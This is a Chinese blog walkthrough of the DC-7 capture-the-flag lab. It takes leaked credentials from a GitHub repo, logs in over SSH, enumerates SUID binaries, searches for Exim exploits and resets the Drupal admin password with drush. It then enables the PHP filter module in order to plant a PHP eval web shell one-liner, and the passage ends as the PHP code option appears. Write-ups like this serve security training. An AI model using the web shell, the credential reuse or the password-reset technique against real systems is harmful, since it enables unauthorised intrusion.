<p>对网页<a target="_blank" rel="noopener" href="http://192.168.204.136/user/password/%E8%BF%9B%E8%A1%8C%E6%8A%93%E5%8C%85">http://192.168.204.136/user/password/进行抓包</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978552370.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>啊？尝试在上述<code>Username or email address</code>输入用户名<code>admin</code>，执行放行之后会跳转到登陆网页<a target="_blank" rel="noopener" href="http://192.168.204.136/user/login/%EF%BC%8C%E5%B9%B6%E4%B8%94%E6%98%BE%E7%A4%BA%EF%BC%9A">http://192.168.204.136/user/login/，并且显示：</a></p>
<p><code>Further instructions have been sent to your email address.</code></p>
<p>—— 更多说明已经发送至您的邮箱地址</p>
<p>这里说明，有一个合法的用户名一定为<code>admin</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978616197.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试使用<code>admin 123456</code>进行登陆，抓包查看是什么情况</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978973726.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>但是放行完毕之后显示了错误，如下图，其中抓取的有明文登陆信息的数据包如上所示。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978991720.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试点击<code>Reset your password</code>，会发现，它又跳转回这个password界面了。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721979099041.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>那既然如此，要不填一下我的邮箱？笨笨！那肯定不行啊！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721979559988.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试强行获取合法的用户名密码这条路暂时走不通了。</p>
<h3 id="网页信息提示"><a href="#网页信息提示" class="headerlink" title="网页信息提示"></a>网页信息提示</h3><p>返回目标网站的首页，再次仔细查看所有的提示。</p>
<p>整个网页显示界面如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721979915603.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>组成要素有：左上角<code>Home</code>目录，接下来是<code>Search</code>搜索框，然后其右边是一个欢迎提示，提示我们要跳出惯性思维的。然后左下角是<code>Powered by [Drupal](https://www.drupal.org)</code>表示该网站由Drupal提供支持，然后下面还有个<code>@DC7USER</code>。</p>
<p>首先，我们可以先来顺一下平常打靶场的惯性思维是什么，首先肯定是查找网页框架漏洞，尝试利用漏洞Getshell（或提权），或者是通过目录爆破或密码爆破，获得合法的用户账户。然后想办法反弹shell，查找用户目录下的文件或利用命令提权，最终找到flag文件。</p>
<p>既然这里提示说要远远跳出惯性思维，那就是说，这里办法对于这个目标靶场都不行。</p>
<p>因此，我们就需要关注一些可能平常并不会注意到的其它有用的信息。</p>
<p>比如上面在展示技术支持之后的<code>@DC7USER</code>，如果连接上上面的<code>Powered by</code>的话，也可以理解为<code>由DC7USER和Drupal提供支持</code>，那这个<code>DC7USER</code>可能就是一个有贡献的技术人员，可以尝试去通过网页搜索一下这个名字。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721980846000.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>我嘞个豆，还真有这个github账户。点进去看看。发现有一个<code>staffdb</code>仓库，继续点进去查看。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721980955536.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="DC7USER的staffdb仓库信息检索"><a href="#DC7USER的staffdb仓库信息检索" class="headerlink" title="DC7USER的staffdb仓库信息检索"></a>DC7USER的staffdb仓库信息检索</h3><p>首先，查看<code>Readme</code>文件，说这个仓库中包含了一些代码，关于改变的代码。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721982451326.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>对仓库中的文件进行逐一排查，发现在<code>config.php</code>代码文件中出现了用户名密码等信息：</p>
<blockquote>
<p>servername &#x3D; localhost</p>
<p>username &#x3D; dc7user</p>
<p>password &#x3D; MdR3xOgB7#dW</p>
<p>dbname &#x3D; Staff</p>
<p>conn &#x3D; mysqli_connect($servername, $username, $password, $dbname);</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721982622019.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>在<code>createmany.php</code>中发现了疑似职员的两条信息，分别是CEO Mary和人事 Julie。</p>
<blockquote>
<p>‘Mary’, ‘Moe’, ‘CEO’, ‘46478415155456’, ‘<a href="mailto:&#109;&#x61;&#114;&#x79;&#64;&#x65;&#120;&#x61;&#109;&#112;&#x6c;&#101;&#46;&#x63;&#x6f;&#x6d;">&#109;&#x61;&#114;&#x79;&#64;&#x65;&#120;&#x61;&#109;&#112;&#x6c;&#101;&#46;&#x63;&#x6f;&#x6d;</a>‘</p>
<p>‘Julie’, ‘Dooley’, ‘Human Resources’, ‘46457131654’, ‘<a href="mailto:&#x6a;&#x75;&#x6c;&#105;&#x65;&#64;&#x65;&#x78;&#97;&#x6d;&#x70;&#108;&#101;&#x2e;&#99;&#111;&#x6d;">&#x6a;&#x75;&#x6c;&#105;&#x65;&#64;&#x65;&#x78;&#97;&#x6d;&#x70;&#108;&#101;&#x2e;&#99;&#111;&#x6d;</a>‘</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721982882990.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>然后其它的php代码文件也没啥有用的信息了。</p>
<h2 id="用户登陆"><a href="#用户登陆" class="headerlink" title="用户登陆"></a>用户登陆</h2><p>即：<code>获得目标用户的命令执行权限以及操作界面</code></p>
<p>上面信息检索获取到的有用信息如下，其中包含了明文形式的用户名和密码：</p>
<blockquote>
<p>servername &#x3D; localhost</p>
<p>username &#x3D; dc7user</p>
<p>password &#x3D; MdR3xOgB7#dW</p>
<p>dbname &#x3D; Staff</p>
<p>conn &#x3D; mysqli_connect($servername, $username, $password, $dbname);</p>
</blockquote>
<p><strong>（1）首先，先尝试连接一下mysql数据库呗</strong></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983651021.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983736766.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>但是发现不大行，密码正确但是访问被拒绝。修改一下主机信息为目标靶机的IP地址，再次尝试：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983815703.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983847338.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现无法连接惹。后面查找资料说可能端口号也得改，尝试修改之后还是无法连接。</p>
<ul>
<li><strong>嘻嘻，介绍一下使用命令行连接MySQL数据库的方法</strong></li>
</ul>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41062572/article/details/103234358">mysql使用cmd命令行方式连接数据库</a></p>
<p><code>mysql -h 本机地址 -u 用户名 -p 密码</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721991581789.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721991661140.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>- </p>
<p>那就使用上述获取的用户名和密码分别进行<strong>登陆界面测试</strong>和<strong>远程ssh连接测试</strong>。</p>
<blockquote>
<p>username &#x3D; dc7user</p>
<p>password &#x3D; MdR3xOgB7#dW</p>
</blockquote>
<p><strong>（2）登陆界面登陆</strong></p>
<p><a target="_blank" rel="noopener" href="http://192.168.204.136/user/login/">http://192.168.204.136/user/login/</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721991869898.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现登陆失败。</p>
<p><strong>（3）ssh远程连接登陆</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ssh dc7user@192.168.204.136<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992090749.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现登陆成功！注意哦！这里登陆的dc7user账户并不一定是目标靶机的合法用户。根据已有的提示，他是目标靶机的相关技术人员。我们获得他的shell之后可以搜寻更多能够帮助我们get到目标靶机shell的信息。</p>
<h2 id="Get-shell"><a href="#Get-shell" class="headerlink" title="Get shell"></a>Get shell</h2><h3 id="dc7user账户信息检索"><a href="#dc7user账户信息检索" class="headerlink" title="dc7user账户信息检索"></a>dc7user账户信息检索</h3><p>首先可以先明确一点，就是，尽管我们拿到的不是目标靶机的shell，但是为什么也要尝试提权，因为这个用户是技术提供者，管理员权限下说不定会有更加重要的文件或数据，这些数据对我们get目标靶机的shell很有帮助。</p>
<p>查看具有SIUD权限的命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -perm -u=s -<span class="hljs-built_in">type</span> f 2&gt;/dev/null<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992165793.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>根据以往的经验，比较大可能能够提权成功的命令为：<code>exim4</code></p>
<p>查看sudo配置信息，<code>sudo -l</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992327583.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现sudo命令被限制了。</p>
<p>查看当前用户目录列表，<code>ls</code>，发现有两个文件：<code>backups</code> 、<code>mbox</code></p>
<p>· 查看<code>backups</code> 文件夹，其包含了两个gpg后缀的文件，一个应该跟数据库有关，另一个和压缩文件有关</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992484900.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992472967.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<blockquote>
<ul>
<li>.tgz.gpg加密文件的解压</li>
</ul>
<p>以input_file.tgz.gpg 文件为例，需要先将其解密（用gpg命令）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">gpg --output output_file.tgz --decrypt input_file.tgz.gpg<br>tar -xvzf output_file.tgz<br></code></pre></td></tr></table></figure>

<p>然后会提示输入密钥….输入后回车，密钥正确的话就会得到output_file.tgz 文件，然后用tar命令解压.tgz就可以了</p>
<ul>
<li>.sql.gpg加密文件的解压</li>
</ul>
<p>同样需要密钥。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gpg --decrypt filename.sql.gpg &gt; filename.sql<br></code></pre></td></tr></table></figure>
</blockquote>
<p>咦~，本来想退回上级目录，继续查看第二个文件的，这个时候突然收到一条邮件信息：</p>
<p><code>/var/mail/dc7user</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992957913.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>但是还是先查看<code>mbox</code>文件吧</p>
<p>· <code>mbox</code>，cat命令获取该文件的内容。哟嚯，不会是邮箱mailbox吧！！</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993115456.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>比较显眼的信息：<code>Database dump saved to /home/dc7user/backups/website.sql</code></p>
<p>· 去<code>/var/mail/dc7user</code>查看新接收到的信息</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993415979.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>和上述<code>mbox</code>显示出来的信息差不多，基本都指向我们要获取<code>/home/dc7user/backups/website.sql</code>这个文件。</p>
<p>另外，这些操作记录还有一个提示，使用的exim版本是：<code>Exim 4.89</code>，后面可以尝试通过搜查和利用漏洞getshell。</p>
<h4 id="1-website-sql-gpg文件解密"><a href="#1-website-sql-gpg文件解密" class="headerlink" title="1.website.sql.gpg文件解密"></a>1.website.sql.gpg文件解密</h4><p>尝试使用上述获得的用户密码来对gpg文件进行解密</p>
<blockquote>
<p>username &#x3D; dc7user</p>
<p>password &#x3D; MdR3xOgB7#dW</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">gpg --decrypt website.sql.gpg &gt; website.sql<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993729714.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>密码错误，解密失败。</p>
<p>回顾上面的操作记录信息，可以得知其使用了<code>/opt/scripts/backups.sh</code>D的备份脚本文件进行备份。那就看看它的具体内容，看看有什么提示。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993959343.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<blockquote>
<p>.sh脚本程序的代码含义如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span><br><span class="hljs-built_in">rm</span> /home/dc7user/backups/*<br><span class="hljs-built_in">cd</span> /var/www/html/<br>drush sql-dump --result-file=/home/dc7user/backups/website.sql<br><span class="hljs-built_in">cd</span> ..<br>tar -czf /home/dc7user/backups/website.tar.gz html/<br>gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql<br>gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz<br><span class="hljs-built_in">chown</span> dc7user:dc7user /home/dc7user/backups/*<br><span class="hljs-built_in">rm</span> /home/dc7user/backups/website.sql<br><span class="hljs-built_in">rm</span> /home/dc7user/backups/website.tar.gz<br></code></pre></td></tr></table></figure>

<p>指定使用bash解释器来执行</p>
<p>删除 &#x2F;home&#x2F;dc7user&#x2F;backups&#x2F; 目录下的所有文件，注意哦，不会删除子目录，只删除文件</p>
<p>切换到 &#x2F;var&#x2F;www&#x2F;html&#x2F; 目录（web服务器的根目录）</p>
<p>使用<code>drush</code> Drupal shell 工具生成数据库备份，sql-dump命令将Drupal数据库导出到目标文件中</p>
<p>返回上一级目录</p>
<p>使用tar命令将 html&#x2F; 目录压缩成一个gzip格式的文件</p>
<p>使用<code>gpg</code>对 &#x2F;home&#x2F;dc7user&#x2F;backups&#x2F;website.sql 文件进行对称加密，并指定用于加密的密码</p>
<p>使用<code>gpg</code>对 &#x2F;home&#x2F;dc7user&#x2F;backups&#x2F;website.tar.gz 文件进行对称加密，密码与之前的相同</p>
<p>将 &#x2F;home&#x2F;dc7user&#x2F;backups&#x2F; 目录下所有文件的所有权更改为 dc7user 用户及其组，包括之前加密的文件。</p>
<p>删除未加密的 website.sql 文件</p>
<p>删除未加密的 website.tar.gz 文件</p>
</blockquote>
<p>程序执行之后会删掉那些明文文件。我在想，要不修改一下文件然后，删掉那些删除命令，看看能不能行。</p>
<p>先尝试执行<code>/opt/scripts/backups.sh</code>看看自己是否有执行权限吧。</p>
<p>哦豁！成功了！说明我们有执行权限。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721994182667.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用<code>nano</code>命令进入该.sh文件</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721994385247.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现这里提示不可写。那我们就尝试使用替代命令：<code>ctrl+\</code>，删掉最后两行。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721994686896.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>但是在执行保存的时候被拒绝执行了。</p>
<p>那我们可以新建一个文件啊，替换掉原来的。通过尝试，发现也不行。</p>
<p>总的来说，我们有权限执行<code>backups.sh</code>文件，但尝试修改<code>backups.sh</code>脚本文件失败。</p>
<h4 id="2-漏洞利用"><a href="#2-漏洞利用" class="headerlink" title="2.漏洞利用"></a>2.漏洞利用</h4><p>既然尝试修改<code>backups.sh</code>文件失败，那就尝试漏洞搜寻，看看能不能利用漏洞提权。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">searchsploit exim 4<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995081467.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>刚好发现有一个符合版本条件的。使用<code>-p</code>选项查看其详细信息。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995160390.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>cat一下查看文件的详细内容。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995287152.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995312041.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>通过漏洞版本右边的提示<code>&#39;BDAT&#39; Denial of Service </code>可以知道它使用的是<code>BDAT拒绝服务攻击&#39;</code>，有关这个攻击的介绍好像比较少：<a target="_blank" rel="noopener" href="https://ti.qianxin.com/uploads/2018/01/26/12bf53828dc9c468e47104459b0f2bbc.pdf">Exim 服务器 BDAT 指令远程代码执行漏洞-奇安信报告</a>，虽然它给出了利用命令，但是不大确定行不行啊。</p>
<p>而且尝试过后，命令报错了。可能还得做其它的设置，有点麻烦。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995866099.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>使用<code>Metasploit</code>找一找吧！</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">search exim 4<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995952245.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现编号为1的漏洞，其exim版本号刚好符合我们的要求，而且危险等级也是excellent，时间也很新。尝试利用一下这个漏洞。</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/R1card0/articles/12960290.html">metasploit实战（一）local_exploit_suggester提权</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721996262841.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>emm……不会利用啊（上面的链接看着挺类似，但是稍微复杂）。明显，要是我们死磕漏洞利用的话，那可能会花费很多时间。</p>
<p>码垛！看来又得切换思路了。</p>
<h4 id="3-命令执行"><a href="#3-命令执行" class="headerlink" title="3.命令执行"></a>3.命令执行</h4><p>之前我们使用find命令对具有SUID权限的命令进行了搜索，也对其中提权成功的可能性较高的命令进行了尝试，但是发现均行不通。</p>
<p>不过别灰心，我们在上一步信息检索的时候发现了 <code>/opt/scripts/backups.sh</code>这个重要的文件，而且通过测试发现我们对这个脚本文件具有执行权限。言外之意就是，对脚本中使用到的所有命令都具有执行权限。</p>
<p>脚本中使用到的关键命令为：<code>drush</code>和<code>gpg</code>。</p>
<p>在脚本文件中。<code>drush</code> Drupal shell 工具主要用于生成数据库备份，sql-dump命令将Drupal数据库导出到目标文件中。<code>gpg</code>主要对文件进行加密。</p>
<p>通过网络搜索查找关于这两个命令的更详细功能：</p>
<blockquote>
<p><code>drush</code>：是一个shell接口，可以直接从云服务器使用命令行管理Drupal。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/xuanunix/article/details/135921223">Drush初学者指南：Drupal Shell</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/single_g_l/article/details/126322111">Drupal drush 常用命令</a></p>
<p>其中，提到了<code>drush</code>拥有更改用户密码的功能：</p>
<p><code>drush user-password admin --password=&quot;new_pass&quot;</code></p>
<p><code>gpg</code>：对文件进行加密&#x2F;解密&#x2F;签名。</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/willingtolove/article/details/122362705">GPG使用方法总结（密钥管理，加解密文件）</a></p>
</blockquote>
<p>利用<code>drush</code>拥有更改用户密码的功能，我们是否能够修改root用户的密码呢！</p>
<p>可以尝试一下！首先，我们之前在进行网页信息检索测试的时候，发现了<code>admin</code>是目标网站的一个合法用户名，那么我们可以尝试对该用户进行密码更新，再通过ssh连接或者su用户切换验证效果。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">drush user-password admin --password=<span class="hljs-string">&quot;123456&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722004424388.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发生错误提示：</p>
<blockquote>
<p>Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to run this command. The drush command ‘user-password admin’ could not be executed.  </p>
<p>言外之意就是要找到更高级别的引导权限目录才能成功执行drush命令呗。    </p>
</blockquote>
<p>因为drush是一款Drupal shell工具，Drupal又是一个网页CMS框架，直接去web服务器的根目录进行操作呗，试试看。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> /var/www/html/<br>drush user-password admin --password=<span class="hljs-string">&quot;123456&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722005001057.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>修改成功！</p>
<p>之前是在网页的登陆网站上发现了提示”admin“为合法用户的信息，而且drush工具也是在web服务器的根目录下才运行成功的，那验证自然也去登陆网页上进行验证。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722005189250.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>成功了捏！登陆了管理员系统。</p>
<p>在dc7user账户信息检索过程中，虽然我们没有成功提权，获得数据库备份数据文件，但是我们通过了drush工具成功修改了管理员的网页系统账户。也算是一个大大的收获</p>
<h3 id="后台管理系统信息检索"><a href="#后台管理系统信息检索" class="headerlink" title="后台管理系统信息检索"></a>后台管理系统信息检索</h3><p>回顾之前通过网页进行getshell的操作，无非是①利用注入点上传一句话木马然后用中国蚁剑进行连接触发，②利用文件包含等漏洞注入一句话木马或反弹shell命令。</p>
<p>所以对于这个后台管理系统的网页，要想getshell也是同理。</p>
<p>如果从漏洞利用入手的话可能比较困难，因为在对之前的目录列表进行检索的过程中，并没有什么组成要素是明显地能看出来是属于两个文件的，也就是说文件包含漏洞暂时无法利用；通过之前的nmap扫描可以得知目标网站使用的CMS 框架是 Drupal 在之前对dc7user进行提权的时候我们尝试过漏洞利用，但是失败了。</p>
<p>所以我们的重点可以放在寻找可以注入一句话木马的注入点注入一句话木马来尝试getshell。</p>
<p>在搜索<code>content</code>板块的时候，我们看到了我们之前在以游客身份访问目标网站的时候出现的所有可能响应界面内容，可以看到它们的内容类型都是<code>Basic page</code>。用户通过网站提交请求后会根据后台设置的不同条件返回相应的响应界面给操作用户。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084389560.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>点进去欢迎界面进行查看：</p>
<p>有标题、内容以及文本格式等可操作选项。既然网站能够执行并响应显示这些内容，说明后台可能对这几部分内容有对应的代码操作模块。</p>
<p>也就是说，这里可以作为一个一句话木马的注入点。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084587047.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试新建一个页面，在<code>body</code>处写入一句话木马：</p>
<blockquote>
<?php @eval($_POST['shell']); ?>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084234331.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>写入的一句话木马是php文件，格式自然对应php，但是在下方的文件格式并没有php格式选项。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084968257.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>通过搜索，可以知道Drupal 8 为了安全，已经默认不添加php格式解析模块，需要用户手动到扩展模块添加。</p>
<p>首先就是要查找php模块包的下载地址。</p>
<p>根据提示信息，那就点击超链接去<code>modules</code>模块寻找我们所需要的php模块包。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722085979531.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>搜索信息：drupal 8版本、php模块</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722086362763.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087300866.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>点击下面的<code>Read more</code>，下滑，可以看到有相应版本的压缩包。查看所有版本。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087351360.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>选择第一个进行下载吧，它看着好像挺可靠的。没有红的也没有黄的。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087443573.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087601508.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>右键复制下载链接地址，可别点击下到自己的主机了，没用的捏。</p>
<p>php模块包的下载地址：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://ftp.drupal.org/files/projects/php-8.x-1.2.tar.gz">https://ftp.drupal.org/files/projects/php-8.x-1.2.tar.gz</a></p>
</blockquote>
<p>回到模块下载页面，输入链接进行下载：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087651737.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>是太安全了吗？（流汗黄豆）</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087719295.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>换第二个不安全的链接试试：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz">https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz</a></p>
</blockquote>
<p>噢！码垛，真给他下载成功了。（两颗流汗黄豆）</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087831235.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>选择如下选项：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087887054.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>返回之前要注入一句话木马的界面，发现这个时候还是没有php格式的选项：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087999896.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>去扩展模块搜搜看是怎么回事吧。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088047212.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088082600.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>还需要下载！！！！</p>
<p>现在再回去看，就发现已经有了<code>PHP code</code>选项  </p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088121510.png" srcset="/img/loading.gif" lazyload alt="img"></p>
